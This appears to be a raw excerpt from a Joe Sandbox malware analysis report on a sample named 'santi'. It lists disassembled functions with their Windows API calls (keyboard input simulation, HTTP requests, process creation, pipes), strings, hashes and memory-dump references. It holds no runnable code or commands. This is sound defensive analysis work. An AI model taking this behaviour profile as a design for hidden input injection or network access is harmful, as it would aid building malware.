                                                                • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00323A4D
                                                                Strings
                                                                • qw601qqw601qqw601qqw661qqw6a1qqw601qqw631qqw661qqw6a1qqw601qqw601qqw661qqw6a1qqw601qqw671qqw661qqw681qqw601qqw601qqw601qqw601qqw60, xrefs: 0032399D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                • String ID: qw601qqw601qqw601qqw661qqw6a1qqw601qqw631qqw661qqw6a1qqw601qqw601qqw661qqw6a1qqw601qqw671qqw661qqw681qqw601qqw601qqw601qqw601qqw60
                                                                • API String ID: 432972143-3317250924
                                                                • Opcode ID: 05d14f2c7b6bb016cca398b265524e364d1165559948e3a0dc6f8403836b8327
                                                                • Instruction ID: 480ca59c3f3e1b49e40d66320de1ca9236f75c2241f0631f3e395711473bcbb1
                                                                • Opcode Fuzzy Hash: 05d14f2c7b6bb016cca398b265524e364d1165559948e3a0dc6f8403836b8327
                                                                • Instruction Fuzzy Hash: F2412870E04228AEEF238B64E805BFEBBB99B56310F04415AF5C1962C1C7BD8EC5D765
                                                                Function 00323A61 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 104keyboardwindowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 00323AB8
                                                                • SetKeyboardState.USER32(00000080,?,00008000), ref: 00323AD4
                                                                • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00323B34
                                                                • SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 00323B92
                                                                Strings
                                                                • qw601qqw601qqw601qqw661qqw6a1qqw601qqw631qqw661qqw6a1qqw601qqw601qqw661qqw6a1qqw601qqw671qqw661qqw681qqw601qqw601qqw601qqw601qqw60, xrefs: 00323AF2
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                • String ID: qw601qqw601qqw601qqw661qqw6a1qqw601qqw631qqw661qqw6a1qqw601qqw601qqw661qqw6a1qqw601qqw671qqw661qqw681qqw601qqw601qqw601qqw601qqw60
                                                                • API String ID: 432972143-3317250924
                                                                • Opcode ID: 850bab806fe34ac2cf201532a1722cd765e2b62e9bc72fa1ea74c276ad4c8bce
                                                                • Instruction ID: 024d9331689ebfd52350c07b5799d1208c55d8b0192098dd563635de9522d860
                                                                • Opcode Fuzzy Hash: 850bab806fe34ac2cf201532a1722cd765e2b62e9bc72fa1ea74c276ad4c8bce
                                                                • Instruction Fuzzy Hash: A9313530A04278AEEF238F64AC19BFE7BB99B55311F05011AE482972D1C7BC8F85D765
                                                                Function 00340567 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CharLowerBuffW.USER32(?,?,?,?), ref: 00340587
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: BuffCharLower
                                                                • String ID: cdecl$none$stdcall$winapi
                                                                • API String ID: 2358735015-567219261
                                                                • Opcode ID: b74209a6341976987e693adfe1df2aff998bf69a18cadc766f3fd1f294308ba8
                                                                • Instruction ID: b2b243a47499ee9462f7f9aca0538e8f7f47c3877cd32c3b5e08cbc66f170a8f
                                                                • Opcode Fuzzy Hash: b74209a6341976987e693adfe1df2aff998bf69a18cadc766f3fd1f294308ba8
                                                                • Instruction Fuzzy Hash: 6831E330610216AFCF06EF64C8419EEB3B4FF50314B514629E526AB2D1DB75A912CF80
                                                                Function 0031B80A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0031B88E
                                                                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0031B8A1
                                                                • SendMessageW.USER32(?,00000189,?,00000000), ref: 0031B8D1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: MessageSend
                                                                • String ID: ComboBox$ListBox
                                                                • API String ID: 3850602802-1403004172
                                                                • Opcode ID: 625300594215c32fa35ba7cb38402254b512cc93296a4446d0ea54fd40e780b1
                                                                • Instruction ID: c9cf4a9461a9c3351469d528e7c7990e552d99964bc26e01d8c7af362185bd87
                                                                • Opcode Fuzzy Hash: 625300594215c32fa35ba7cb38402254b512cc93296a4446d0ea54fd40e780b1
                                                                • Instruction Fuzzy Hash: AF212372A40148BFDB0AABA5C886DFFB77CDF0A754B50412DF021A72E0DB740D568B60
                                                                Function 002E51AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _memset.LIBCMT ref: 002E522F
                                                                • _wcscpy.LIBCMT ref: 002E5283
                                                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 002E5293
                                                                • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00353CB0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                                • String ID: Line:
                                                                • API String ID: 1053898822-1585850449
                                                                • Opcode ID: d6cdd0623513d91abc7aa424261029f4ceaaf682359b333146bd67e99db5bbf2
                                                                • Instruction ID: 73435c1eedf19cb9b2a7c9db156f03b181c4a89a7654129cb3bdb77f847bc88c
                                                                • Opcode Fuzzy Hash: d6cdd0623513d91abc7aa424261029f4ceaaf682359b333146bd67e99db5bbf2
                                                                • Instruction Fuzzy Hash: 6A3125310683906FC322EB51DC46FDF77DCAF45304F40451EF68996091EBB0A668CB92
                                                                Function 003343E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00334401
                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00334427
                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00334457
                                                                • InternetCloseHandle.WININET(00000000), ref: 0033449E
                                                                  • Part of subcall function 00335052: GetLastError.KERNEL32(?,?,003343CC,00000000,00000000,00000001), ref: 00335067
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                • String ID:
                                                                • API String ID: 1951874230-3916222277
                                                                • Opcode ID: 5c4060f79fcd41188e6d5f5d744da11b2d329ca04b36261643c4a127d902d5d5
                                                                • Instruction ID: 01dde81944acc620ed5852031dfbd7b1c9fd8e5686f20816da9c737e8b7253ae
                                                                • Opcode Fuzzy Hash: 5c4060f79fcd41188e6d5f5d744da11b2d329ca04b36261643c4a127d902d5d5
                                                                • Instruction Fuzzy Hash: E5219FB2604208BFE7139F55CCC5EBFB6ECEB49748F10842AF50996140EA65AD059771
                                                                Function 003490E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 002FD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 002FD1BA
                                                                  • Part of subcall function 002FD17C: GetStockObject.GDI32(00000011), ref: 002FD1CE
                                                                  • Part of subcall function 002FD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 002FD1D8
                                                                • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0034915C
                                                                • LoadLibraryW.KERNEL32(?), ref: 00349163
                                                                • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00349178
                                                                • DestroyWindow.USER32(?), ref: 00349180
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                • String ID: SysAnimate32
                                                                • API String ID: 4146253029-1011021900
                                                                • Opcode ID: 2273fbdb9e9796ac92ee805d7aaf849fc1ffde8a60e700c97134b2ff0f8a48fc
                                                                • Instruction ID: 75df8d2ae4042b52ead7c5da868caf4241e4c03001d14fab889303cfb37a3312
                                                                • Opcode Fuzzy Hash: 2273fbdb9e9796ac92ee805d7aaf849fc1ffde8a60e700c97134b2ff0f8a48fc
                                                                • Instruction Fuzzy Hash: DB21D171600206BBEF228F64DC89FBB37EDEF99364F11461AF9549A190C375EC41A760
                                                                Function 00329568 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetStdHandle.KERNEL32(0000000C), ref: 00329588
                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003295B9
                                                                • GetStdHandle.KERNEL32(0000000C), ref: 003295CB
                                                                • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00329605
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: CreateHandle$FilePipe
                                                                • String ID: nul
                                                                • API String ID: 4209266947-2873401336
                                                                • Opcode ID: 5cddeb5477efa30a474b4392dc4c973e5c9a7c67fac469fbaca58e8b2a54ca39
                                                                • Instruction ID: 724235811c0352a0bf044dca07f775e487e3ba83bfab166b6301fc82e5479eaa
                                                                • Opcode Fuzzy Hash: 5cddeb5477efa30a474b4392dc4c973e5c9a7c67fac469fbaca58e8b2a54ca39
                                                                • Instruction Fuzzy Hash: 51216070700215ABEB229F25EC05B9A7BF8AF4A720F304A1AF9A1D72D0D770D954CB60
                                                                Function 00329634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetStdHandle.KERNEL32(000000F6), ref: 00329653
                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00329683
                                                                • GetStdHandle.KERNEL32(000000F6), ref: 00329694
                                                                • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 003296CE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: CreateHandle$FilePipe
                                                                • String ID: nul
                                                                • API String ID: 4209266947-2873401336
                                                                • Opcode ID: 80d106d0f6a94cef63db97caeda9c1a756e9a8c878ce1d9aa46902c2c7fd3520
                                                                • Instruction ID: 5440cad266d84720225e727ad7e0bda57b5ea39c93b16aa7780787dd04e50b10
                                                                • Opcode Fuzzy Hash: 80d106d0f6a94cef63db97caeda9c1a756e9a8c878ce1d9aa46902c2c7fd3520
                                                                • Instruction Fuzzy Hash: FC219571A002259BDB229F69AC45F9A77ECAF45730F204A1AFDB1E72D0D7B4D841CB60
                                                                Function 0032DAF6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetErrorMode.KERNEL32(00000001), ref: 0032DB0A
                                                                • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0032DB5E
                                                                • __swprintf.LIBCMT ref: 0032DB77
                                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000,0037DC00), ref: 0032DBB5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ErrorMode$InformationVolume__swprintf
                                                                • String ID: %lu
                                                                • API String ID: 3164766367-685833217
                                                                • Opcode ID: 785f753c79ce252aebeca6cf47bdcdede48c683acf2cbce6fb66c1da42643cbe
                                                                • Instruction ID: 7e2e43e6daabb431c4387e97656448f2af17dee812fcde7420ea92cc669d523f
                                                                • Opcode Fuzzy Hash: 785f753c79ce252aebeca6cf47bdcdede48c683acf2cbce6fb66c1da42643cbe
                                                                • Instruction Fuzzy Hash: E3218035A00148AFCB11EFA5DD95DEEBBB8EF49704B104069F509EB251DBB1EA41CF60
                                                                Function 0031C9E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0031C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0031C84A
                                                                  • Part of subcall function 0031C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0031C85D
                                                                  • Part of subcall function 0031C82D: GetCurrentThreadId.KERNEL32 ref: 0031C864
                                                                  • Part of subcall function 0031C82D: AttachThreadInput.USER32(00000000), ref: 0031C86B
                                                                • GetFocus.USER32 ref: 0031CA05
                                                                  • Part of subcall function 0031C876: GetParent.USER32(?), ref: 0031C884
                                                                • GetClassNameW.USER32(?,?,00000100), ref: 0031CA4E
                                                                • EnumChildWindows.USER32(?,0031CAC4), ref: 0031CA76
                                                                • __swprintf.LIBCMT ref: 0031CA90
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                                • String ID: %s%d
                                                                • API String ID: 3187004680-1110647743
                                                                • Opcode ID: fbfc1c7a04e30dbd0e8fa7dd640aea45882e6983968b58544c5001e82cfe7c2c
                                                                • Instruction ID: c459039005096ce34861ca7f371082b316627e36c7d31ebf93ddec166250d357
                                                                • Opcode Fuzzy Hash: fbfc1c7a04e30dbd0e8fa7dd640aea45882e6983968b58544c5001e82cfe7c2c
                                                                • Instruction Fuzzy Hash: C51172716502097BDB17BF60DCC9FE9376CAF58714F009066FE08AA182CB709585DB71
                                                                Function 00307A94 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • __lock.LIBCMT ref: 00307AD8
                                                                  • Part of subcall function 00307CF4: __mtinitlocknum.LIBCMT ref: 00307D06
                                                                  • Part of subcall function 00307CF4: EnterCriticalSection.KERNEL32(00000000,?,00307ADD,0000000D), ref: 00307D1F
                                                                • InterlockedIncrement.KERNEL32(?), ref: 00307AE5
                                                                • __lock.LIBCMT ref: 00307AF9
                                                                • ___addlocaleref.LIBCMT ref: 00307B17
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                • String ID: `6
                                                                • API String ID: 1687444384-2178887039
                                                                • Opcode ID: 3a2d34348b75673652d56c18e0daffb1f6152283b39bf9ea3a11a14c49fccd05
                                                                • Instruction ID: 0fedcbde0a5b38d50cfba9c0aafa5fc2ee04185e3f8c95f3f764b08692074797
                                                                • Opcode Fuzzy Hash: 3a2d34348b75673652d56c18e0daffb1f6152283b39bf9ea3a11a14c49fccd05
                                                                • Instruction Fuzzy Hash: F2016175906B00DFD722DF75C91674AB7F0AF40325F20890EE4969B6E0CBB0A644CB45
                                                                Function 0034E32E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40processCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _memset.LIBCMT ref: 0034E33D
                                                                • _memset.LIBCMT ref: 0034E34C
                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,003A3D00,003A3D44), ref: 0034E37B
                                                                • CloseHandle.KERNEL32 ref: 0034E38D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: _memset$CloseCreateHandleProcess
                                                                • String ID: D=:
                                                                • API String ID: 3277943733-607546626
                                                                • Opcode ID: 3e48b8cf796815efab032c9d0f9f67d3842b3e84d0934cbf179e33ce54f96fea
                                                                • Instruction ID: 01b10d665eb8200c9b8b89197313dca99fa15125d326de6fb594887c5e897434
                                                                • Opcode Fuzzy Hash: 3e48b8cf796815efab032c9d0f9f67d3842b3e84d0934cbf179e33ce54f96fea
                                                                • Instruction Fuzzy Hash: 5BF082F5640304FEE3131BA0AC56FB7BE5CDB06B54F004421FE0ADA1A2D3759E0086B8
                                                                Function 00341945 Relevance: 7.7, APIs: 5, Instructions: 232COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 003419F3
                                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00341A26
                                                                • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00341B49
                                                                • CloseHandle.KERNEL32(?), ref: 00341BBF
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                • String ID:
                                                                • API String ID: 2364364464-0
                                                                • Opcode ID: 34a6c620901aa11ca5857969c8d112ff4442046e9872003ef705c70774aae749
                                                                • Instruction ID: e73ebbfa1bf83ed1b8e35b8c9b42d1b16bdb829e472809a618ffc2f90687db2f
                                                                • Opcode Fuzzy Hash: 34a6c620901aa11ca5857969c8d112ff4442046e9872003ef705c70774aae749
                                                                • Instruction Fuzzy Hash: 6481A170610204EBDF119F64C896BADBBE5EF08720F158469FA05AF3C2D7B5E9518F90
                                                                Function 0034E062 Relevance: 7.7, APIs: 5, Instructions: 187windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0034E1D5
                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 0034E20D
                                                                • IsDlgButtonChecked.USER32(?,00000001), ref: 0034E248
                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0034E269
                                                                • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0034E281
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$ButtonCheckedLongWindow
                                                                • String ID:
                                                                • API String ID: 3188977179-0
                                                                • Opcode ID: 93f9979dfa3790059a020dca26234ecd7918db92086e54f5af3284b562bba632
                                                                • Instruction ID: 1fc498cb044ef6cd2470044173c6708830f85604568bfc42f0f7646344980520
                                                                • Opcode Fuzzy Hash: 93f9979dfa3790059a020dca26234ecd7918db92086e54f5af3284b562bba632
